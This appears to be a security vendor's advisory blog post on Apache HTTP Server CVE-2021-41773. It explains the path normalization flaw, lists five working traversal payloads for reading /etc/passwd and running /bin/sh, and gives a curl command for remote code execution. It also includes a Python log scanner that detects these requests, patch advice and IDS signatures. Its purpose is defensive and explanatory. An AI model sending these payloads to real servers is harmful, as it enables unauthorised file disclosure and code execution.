Five Ways to Simulate Apache CVE-2021-41773 Exploits

Picus Labs has updated the Picus Threat Library with attacks that exploit the path traversal and file disclosure vulnerability in Apache HTTP Server.

What is the CVE-2021-41773 Vulnerability?

Apache published a security advisory for the CVE-2021-41773 path traversal vulnerability on October 5, 2021. Although path traversal vulnerabilities of this type have a long history (e.g., CVE-1999-0253), we unfortunately still encounter them even in widely used software such as Apache. Yes, even after 22 years, the same exploit payload used for CVE-1999-0253 works for CVE-2021-41773.

What Causes This Vulnerability?

According to the Apache HTTP Server Project’s advisory, the CVE-2021-41773 vulnerability was found in a change to path normalization introduced in Apache HTTP Server version 2.4.49. Because of this change, a path traversal attack could map URLs to files outside the expected document root by sending specially crafted requests to the Apache web server. These requests may succeed if files outside the document root are not protected by "require all denied."

Briefly, because of the change in the path normalization mechanism of Apache HTTP Server 2.4.49, the server does not properly neutralize sequences such as ".." that can resolve to a location outside of the intended directory.

Is CVE-2021-41773 a Zero-Day Vulnerability?

No. A zero-day (0-day) vulnerability is one that is either unknown to those responsible for mitigating it (including the vendor) or known but not yet patched. A patch for this vulnerability was released on 2021-10-04 with the 2.4.50 update. So, CVE-2021-41773 is a known and patched vulnerability, and it is definitely not a zero-day.

How do Attackers Exploit the CVE-2021-41773 Vulnerability?

An attacker can use simple malicious HTTP requests to exploit the vulnerability. For example, the following request is sufficient to get the /etc/passwd file:

Payload 1:

http://$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

The ../file_dir/ pattern (CWE-24, also known as Double Dot) is an infamous form of CWE-23 Relative Path Traversal that enables attackers to traverse the file system and reach files or directories outside of the restricted directory.

Our CVE-2021-41773 PoC request includes the “.%2e/” pattern. It is equivalent to the “../” (Double Dot) pattern, since “%2e” is the URL-encoded form of the “.” (dot) character. So, the URL-decoded form of “.%2e/” is “../”.

We can also encode the other dot character to exploit the CVE-2021-41773 vulnerability. In that case, our payload looks like this:

Payload 2:

http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

It is even possible to exploit this Apache path traversal vulnerability by mixing the “.%2e/” and “%2e%2e/” patterns:

Payload 3:

http://$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Our payloads are not limited to the ones above. First, we don’t have to use the /cgi-bin/ directory for exploitation; we can use another existing directory, such as /icons/:

Payload 4:

http://$host/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

I saved the best payload for last. The following URL can be used for remote code execution on a system that runs a vulnerable Apache server with CGI scripts enabled for the traversed path.

Payload 5:

http://$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh


For example, the below Curl request can be used to run the “id” command:

curl --data "A=|echo;id>" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
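As an added example (not part of the original post and not Picus code), the following Python script applies the decoding logic explained above to detect these request patterns in web server access logs. The log lines are constructed samples; the script decodes each request path to a fixed point, so that the .%2e, %2e%2e, mixed and double-encoded forms all reduce to a bare ".." segment before the check, while a name such as "a..b" is left alone.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined-log style), not taken from
# any real server: four traversal attempts from the post plus two benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Oct/2021:10:00:01 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1324 "-" "curl/7.68.0"
10.0.0.5 - - [06/Oct/2021:10:00:02 +0000] "GET /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1324 "-" "curl/7.68.0"
10.0.0.5 - - [06/Oct/2021:10:00:03 +0000] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1324 "-" "curl/7.68.0"
10.0.0.5 - - [06/Oct/2021:10:00:04 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 58 "-" "curl/7.68.0"
10.0.0.9 - - [06/Oct/2021:10:00:05 +0000] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Oct/2021:10:00:06 +0000] "GET /docs/a..b/readme.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Extracts the method and request target from the quoted request line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def has_traversal(raw_path):
    """Return True if the request path contains a '..' segment once URL-decoded.

    Decoding is repeated until the string stops changing, so the single-encoded
    forms shown in the post (.%2e and %2e%2e) and double-encoded forms (%252e)
    are all normalized before the segment check.
    """
    path = raw_path.split('?', 1)[0]   # ignore the query string
    prev = None
    while path != prev:                # decode to a fixed point
        prev, path = path, unquote(path)
    return any(seg == '..' for seg in path.split('/'))


def scan_log(text):
    """Return (line_number, decoded_path) for every log line showing traversal."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if m and has_traversal(m.group('path')):
            hits.append((n, unquote(m.group('path'))))
    return hits


if __name__ == '__main__':
    for n, path in scan_log(SAMPLE_LOG):
        print(f"line {n}: traversal attempt -> {path}")
```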

What is the Impact of CVE-2021-41773 Vulnerability?

CVE-2021-41773 allows unauthenticated attackers to execute arbitrary code and disclose sensitive information on vulnerable systems. Since the CVE-2021-41773 vulnerability can be exploited remotely and doesn’t require an admin or privileged account, its severity is critical.

What is the Current Situation?

As Apache also states, attackers are exploiting this vulnerability in the wild. According to Shodan, there are more than 100,000 vulnerable Apache 2.4.49 web servers as of today.

[Figure: Vulnerable Apache 2.4.49 servers for CVE-2021-41773]

How to Protect Your Organization From CVE-2021-41773 Exploits?

Apache released a patch for this vulnerability on 2021-10-04 with the 2.4.50 update. If you have web servers running Apache 2.4.49, you must update them immediately.

How Does Picus Help Simulate and Prevent CVE-2021-41773 Apache Web Server Exploits?

We also strongly suggest simulating CVE-2021-41773 exploitation attacks with the Picus Continuous Security Control Validation Platform to test the effectiveness of your security controls against such path traversal attacks. The Picus Threat Library includes the following threats for the CVE-2021-41773 vulnerability:

Picus ID   Threat Name
361419     Apache HTTP Server Path Traversal Vulnerability Variant-1
543999     Apache HTTP Server Path Traversal Vulnerability Variant-2
246566     Apache HTTP Server Path Traversal Vulnerability Variant-3
379553     Apache HTTP Server Remote Code Execution Vulnerability Variant-1

Picus Threat Library also contains 100+ path traversal attacks and 2000+ web application attacks as of today.

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Apache HTTP Server CVE-2021-41773 and other vulnerability exploitation attacks in preventive security controls.

Currently, we have confirmed that the following prevention signatures can be used to protect against CVE-2021-41773 exploits. We will update the list as Picus Labs validates the signatures of other vendors/products.

Security Control          Signature   Signature Name
Snort IPS                 2034124     ET EXPLOIT Apache HTTP Server 2.4.49 - Path Traversal Attempt (CVE-2021-41773) M1
Snort IPS                 2034125     ET EXPLOIT Apache HTTP Server 2.4.49 - Path Traversal Attempt (CVE-2021-41773) M2
Snort IPS                 2034126     ET POLICY Apache HTTP Server 2.4.49 Observed - Vulnerable to CVE-2021-41773
Palo Alto Networks NGFW   30844       HTTP Directory Traversal Request Attempt
